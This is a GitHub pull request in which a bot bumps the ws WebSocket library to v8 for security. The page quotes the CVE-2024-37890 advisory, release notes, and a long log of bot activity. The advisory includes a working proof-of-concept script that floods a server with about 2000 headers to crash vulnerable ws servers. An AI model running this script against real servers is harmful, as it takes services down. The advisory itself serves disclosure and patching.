Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update dependency ws to v8 [security] #7595

Open
wants to merge 1 commit into
base: develop
Choose a base branch
from

Conversation

live-github-bot[bot]
Copy link
Contributor

@live-github-bot live-github-bot bot commented Aug 13, 2024

This PR contains the following updates:

Package Type Update Change
ws devDependencies major 7 -> 8
ws dependencies minor 8.17.1 -> 8.18.0

GitHub Vulnerability Alerts

CVE-2024-37890

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References


Release Notes

websockets/ws (ws)

v8.0.0

Compare Source

Breaking changes

  • The WebSocket constructor now throws a SyntaxError if any of the
    subprotocol names are invalid or duplicated (0aecf0c).

  • The server now aborts the opening handshake if an invalid
    Sec-WebSocket-Protocol header field value is received (1877dde).

  • The protocols argument of handleProtocols hook is no longer an Array but
    a Set (1877dde).

  • The opening handshake is now aborted if the Sec-WebSocket-Extensions header
    field value is empty or it begins or ends with a white space (e814110).

  • Dropped support for Node.js < 10.0.0 (552b506).

  • The WebSocket constructor now throws a SyntaxError if the connection URL
    contains a fragment identifier or if the URL's protocol is not one of 'ws:',
    'wss:', or 'ws+unix:' (ebea038).

  • Text messages and close reasons are no longer decoded to strings. They are
    passed as Buffers to the listeners of their respective events. The listeners
    of the 'message' event now take a boolean argument specifying whether or not
    the message is binary (e173423).

    Existing code can be migrated by decoding the buffer explicitly.

    websocket.on('message', function message(data, isBinary) {
      const message = isBinary ? data : data.toString();
      // Continue as before.
    });
    
    websocket.on('close', function close(code, data) {
      const reason = data.toString();
      // Continue as before.
    });
  • The package now uses an ES module wrapper (78adf5f).

  • WebSocketServer.prototype.close() no longer closes existing connections
    (df7de57).

    Existing code can be migrated by closing the connections manually.

    websocketServer.close();
    for (const ws of websocketServer.clients) {
      ws.terminate();
    }
  • The callback of WebSocketServer.prototype.close() is now called with an
    error if the server is already closed (abde9cf).

  • WebSocket.prototype.addEventListener() is now a noop if the type argument
    is not one of 'close', 'error', 'message', or 'open' (9558ed1).

  • WebSocket.prototype.removeEventListener() now only removes listeners added
    with WebSocket.prototype.addEventListener() and only one at time (ea95d9c).

  • The value of the onclose, onerror, onmessage, and onopen properties is
    now null if the respective event handler is not set (6756cf5).

  • The OpenEvent class has been removed (21e6500).

Bug fixes

  • The event listeners added via handler properties are now independent from the
    event listeners added with WebSocket.prototype.addEventListener()
    (0b21c03).

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

Copy link

vercel bot commented Aug 13, 2024

The latest updates on your projects. Learn more about Vercel for Git ↗︎

5 Skipped Deployments
Name Status Preview Comments Updated (UTC)
ledger-live-docs ⬜️ Ignored (Inspect) Visit Preview Jan 17, 2025 11:11pm
ledger-live-github-bot ⬜️ Ignored (Inspect) Visit Preview Jan 17, 2025 11:11pm
native-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Jan 17, 2025 11:11pm
react-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Jan 17, 2025 11:11pm
web-tools ⬜️ Ignored (Inspect) Visit Preview Jan 17, 2025 11:11pm

Copy link

socket-security bot commented Aug 13, 2024

Removed dependencies detected. Learn more about Socket for GitHub ↗︎

🚮 Removed packages: npm/ws@8.17.1

View full report↗︎

@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 87f790d to a2e74a9 Compare August 14, 2024 22:06
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from a2e74a9 to b37c1c5 Compare August 14, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from b37c1c5 to 3bc15be Compare August 14, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 3bc15be to 2819415 Compare August 14, 2024 22:34
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 2819415 to 412337d Compare August 14, 2024 22:42
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 412337d to 63cba8c Compare August 14, 2024 22:48
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 63cba8c to 944b294 Compare August 14, 2024 22:55
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 944b294 to 689a0ce Compare August 14, 2024 23:01
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 689a0ce to da11ebc Compare August 15, 2024 22:05
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from da11ebc to 4f03efb Compare August 15, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 4f03efb to dfc427a Compare August 15, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot added the common Has changes in live-common label Jan 16, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from efeae51 to dead4b8 Compare January 16, 2025 23:02
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Jan 16, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from dead4b8 to 0989085 Compare January 16, 2025 23:12
@live-github-bot live-github-bot bot added the common Has changes in live-common label Jan 16, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 0989085 to ec5a692 Compare January 17, 2025 22:06
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Jan 17, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from ec5a692 to 07a8774 Compare January 17, 2025 22:16
@live-github-bot live-github-bot bot added the common Has changes in live-common label Jan 17, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 07a8774 to 48d5d4a Compare January 17, 2025 22:26
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Jan 17, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 48d5d4a to 9025fab Compare January 17, 2025 22:35
@live-github-bot live-github-bot bot added the common Has changes in live-common label Jan 17, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 9025fab to 4fdfc7b Compare January 17, 2025 22:42
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Jan 17, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 4fdfc7b to 15cf2d6 Compare January 17, 2025 22:49
@live-github-bot live-github-bot bot added the common Has changes in live-common label Jan 17, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 15cf2d6 to 9c20e5c Compare January 17, 2025 22:55
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Jan 17, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 9c20e5c to 1521d76 Compare January 17, 2025 23:03
@live-github-bot live-github-bot bot added the common Has changes in live-common label Jan 17, 2025
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 1521d76 to 5c6686a Compare January 17, 2025 23:10
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Jan 17, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants